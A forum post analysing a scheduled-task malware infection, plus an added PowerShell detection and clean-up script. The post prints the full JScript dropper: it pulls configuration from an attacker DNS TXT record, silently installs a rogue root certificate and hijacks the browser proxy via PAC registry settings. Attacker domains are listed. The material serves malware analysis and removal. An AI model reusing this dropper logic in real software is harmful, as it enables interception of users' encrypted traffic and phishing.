Hey. I've been struggling with this problem for a while, and I think I just solved it. However, I assure you that this malware went undetected by all the many tools I scanned my PC with, so it may require some review by, I don't know, the guys who write those tools.
Here we go: I noticed that Chrome getting closed and that cmd window flashing always happened at 18:00, so I searched in the Task Scheduler. Bingo:
Attachment 54678
(the first one, sorry for it being in Spanish)
The action for that task is the following:
Code:
C:\Windows\system32\wscript.exe //nologo //B //E:jscript "C:\Users\[me]\AppData\Roaming\Adobe Acrobat Pro DC\settings.ini"
Looking at that ini file, it was indeed a JS file badly disguised as INI. Stripped of all the comments, these are its contents:
Code:
var ns, no, re, rs, st, reg, pac;
var ws = new ActiveXObject("Wscript.Shell");              // run commands, read/write the registry
var bs = new ActiveXObject("ADODB.Stream");               // binary stream used to write the downloaded cert
var xh = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); // HTTP client
var tmp = ws.ExpandEnvironmentStrings("%TEMP%");
try {
    // Configuration is fetched over DNS: the TXT record holds "pacUrl|certUrl".
    // Exec() of a console program briefly shows a console window (likely the flashing cmd window).
    ns = ws.Exec("nslookup -type=txt remotesettings1.mtmyoq.se");
    no = ns.StdOut.ReadAll();
    re = new RegExp('"(.*?)"');      // first quoted string in the nslookup output
    rs = re.exec(no);
    st = rs[1].split("|");
    pac = st[0];                      // URL of the proxy auto-config (PAC) file
    cer = st[1];                      // URL of the root certificate (never declared with var, so it becomes a global)
    try {
        // Current PAC URL, if any
        reg = ws.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL");
    } catch (e) {
    }
    // Only act when the PAC URL is not already the attacker's one
    if (reg != pac) {
        // Kill the browsers so the new proxy settings take effect on the next start (window hidden, no wait)
        ws.Run("taskkill /f /im iexplore.exe", 0, false);
        ws.Run("taskkill /f /im chrome.exe", 0, false);
        try {
            // Download the certificate and save it as %TEMP%\cert.cer
            xh.Open("GET", cer, false);
            xh.Send();
            bs.Type = 1;                              // adTypeBinary
            bs.Open();
            bs.Write(xh.ResponseBody);
            bs.SaveToFile(tmp + "\\cert.cer", 2);     // adSaveCreateOverWrite
            // Install it as a trusted root for the current user, hidden window
            ws.Run("certutil -addstore -f -enterprise -user root " + tmp + "\\cert.cer", 0, false);
            // Point the WinINET proxy settings (32-bit and 64-bit views) at the attacker's PAC
            ws.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
            ws.RegWrite("HKEY_CURRENT_USER\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
            // Disable the auto-proxy result cache so the PAC is re-evaluated for every request
            ws.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnableAutoProxyResultCache", 0, "REG_DWORD");
        } catch (e$0) {
        }
    }
} catch (e$1) {
}
Pretty much the behavior we are seeing.
I can see that it also installs a certificate, probably to make that fake Google work over HTTPS without raising errors. I can't tell much about the certificate since I am not very well versed in the subject. What I can tell is that it was created by the Fiddler free web debugging proxy, and that it shows in my installed certs as this:
Attachment 54680
Well yeah, do not trust.
Interestingly, there are several domains involved in the malware. The first one, localhost.world, is where those smelly proxy settings are pulled from, and then there is mtmyoq.se. This last one, when visited, contains a long string that, when base64-decoded, looks like this:
Code:
<Settings>
<Setting>
<ida>1122843206</ida>
<UpdateVer>6.1.7600.20003</UpdateVer>
<UpdateUrl></UpdateUrl>
<UpdateType>2</UpdateType>
<PacUrl>http://searchly.org/router.pac</PacUrl>
<PacFile>ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZiAoc2hFeHBNYXRjaChob3N0LCAid3d3Lmdvb2dsZS4qIikpIHJldHVybiAiUFJPWFkgMTI3LjAuMC4xOjgwODAiOyAgcmV0dXJuICJESVJFQ1QiO30=</PacFile>
<OneIn>1</OneIn>
<RewriteFrom></RewriteFrom>
<RewriteTo></RewriteTo>
<DisableRewrite>0</DisableRewrite>
<Ping>1</Ping>
<RedirectType>0</RedirectType>
<Accounts>
<Account>
<RefUrl>http://www.digital4k.net/search.php?action=results&sid=</RefUrl>
<CX>009793234822822480237:wabrdd_t6e8</CX>
</Account>
</Accounts>
</Setting>
</Settings>
I couldn't tell what that part is, but it involves more domains. What is clear is that this is obviously malware, probably an attempt at phishing. And none of those domains or IPs are blocked by my security software (ESET Smart Security) or seem to be blacklisted anywhere. This is not ok.
Oh, I almost forgot. To get rid of it, just delete the task, the .ini file and all the "DO_NOT_TRUST" certificates, and revert the registry changes made. Ensure that no proxy is set.
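The following script is an added example, not code from the post above, that turns the clean-up steps into a repeatable check. It decodes the PacFile blob quoted in the post (decoding it shows a FindProxyForURL that sends www.google.* to PROXY 127.0.0.1:8080 and everything else DIRECT, which is why only Google looked fake), then looks for the same artifacts on the host: a scheduled task that feeds wscript.exe or cscript.exe a file without a script extension, the AutoConfigURL and EnableAutoProxyResultCache registry values, a root certificate carrying the Fiddler "DO_NOT_TRUST" marker, and the dropped settings.ini. The dropped-file path under %APPDATA%, the "DO_NOT_TRUST" match and the extension whitelist are assumptions taken from this one case; adjust them for yours. Nothing is removed unless -Remove is passed.

```powershell
# Hunt-PacHijack.ps1 (added example, not the original poster's code). Run from an elevated
# PowerShell, review the report, then re-run with -Remove to undo the changes.
[CmdletBinding()]
param([switch]$Remove)

$findings = New-Object System.Collections.Generic.List[string]

# 1. Decode the <PacFile> blob from the Settings XML (value copied from the post).
$pacB64 = 'ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZiAoc2hFeHBNYXRjaChob3N0LCAid3d3Lmdvb2dsZS4qIikpIHJldHVybiAiUFJPWFkgMTI3LjAuMC4xOjgwODAiOyAgcmV0dXJuICJESVJFQ1QiO30='
$pacText = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($pacB64))
Write-Output "Decoded PAC:`n$pacText`n"

# 2. Scheduled tasks that run a script host on a file whose extension is not a script type
#    (the post's task runs wscript.exe //E:jscript on a .ini file).
$suspectTasks = @()
foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        if ($action.Execute -match '(w|c)script\.exe$' -and
            $action.Arguments -notmatch '\.(js|jse|vbs|vbe|wsf|wsh)"?\s*$') {
            $suspectTasks += $task
            $findings.Add("Task $($task.TaskPath)$($task.TaskName): $($action.Execute) $($action.Arguments)")
        }
    }
}

# 3. WinINET proxy settings in both registry views, the policy value the script sets,
#    and any manual proxy.
$inetKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings',
    'HKCU:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings'
)
foreach ($key in $inetKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if ($props.AutoConfigURL) { $findings.Add("AutoConfigURL in $key = $($props.AutoConfigURL)") }
    if ($props.ProxyEnable -eq 1) { $findings.Add("Manual proxy in $key = $($props.ProxyServer)") }
}
$policyKey = 'HKCU:\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings'
$policy = Get-ItemProperty -Path $policyKey -ErrorAction SilentlyContinue
if ($null -ne $policy.EnableAutoProxyResultCache) {
    $findings.Add("EnableAutoProxyResultCache policy = $($policy.EnableAutoProxyResultCache)")
}

# 4. Root certificates with the Fiddler "DO_NOT_TRUST" marker (assumed indicator), both stores.
$badCerts = Get-ChildItem Cert:\CurrentUser\Root, Cert:\LocalMachine\Root |
    Where-Object { $_.Subject -like '*DO_NOT_TRUST*' -or $_.Issuer -like '*DO_NOT_TRUST*' }
foreach ($cert in $badCerts) { $findings.Add("Root cert $($cert.Subject) thumbprint $($cert.Thumbprint)") }

# 5. The dropped script file (path assumed from this case).
$dropped = Join-Path $env:APPDATA 'Adobe Acrobat Pro DC\settings.ini'
if (Test-Path -LiteralPath $dropped) { $findings.Add("Dropped file $dropped") }

if ($findings.Count -eq 0) { Write-Output 'No indicators found.'; return }
$findings | ForEach-Object { Write-Output "FOUND: $_" }
if (-not $Remove) { Write-Output 'Re-run with -Remove to clean up.'; return }

# Clean-up: task, dropped file, proxy settings, certificates.
foreach ($task in $suspectTasks) {
    Unregister-ScheduledTask -TaskName $task.TaskName -TaskPath $task.TaskPath -Confirm:$false
}
if (Test-Path -LiteralPath $dropped) { Remove-Item -LiteralPath $dropped -Force }
foreach ($key in $inetKeys) {
    Remove-ItemProperty -Path $key -Name AutoConfigURL -ErrorAction SilentlyContinue
    Set-ItemProperty -Path $key -Name ProxyEnable -Value 0 -ErrorAction SilentlyContinue
}
Remove-ItemProperty -Path $policyKey -Name EnableAutoProxyResultCache -ErrorAction SilentlyContinue
foreach ($cert in $badCerts) { Remove-Item -Path $cert.PSPath }
Write-Output 'Clean-up done. Restart the browsers and confirm that Internet Options > Connections > LAN settings shows no script address.'
```

The script deliberately makes no network calls: it does not query the TXT record or fetch the PAC, so it can be run on an isolated machine without touching the attacker's infrastructure. Because the malware only rewrites the registry when AutoConfigURL differs from its own PAC URL, removing the task before the registry value matters; otherwise the next 18:00 run simply re-applies everything.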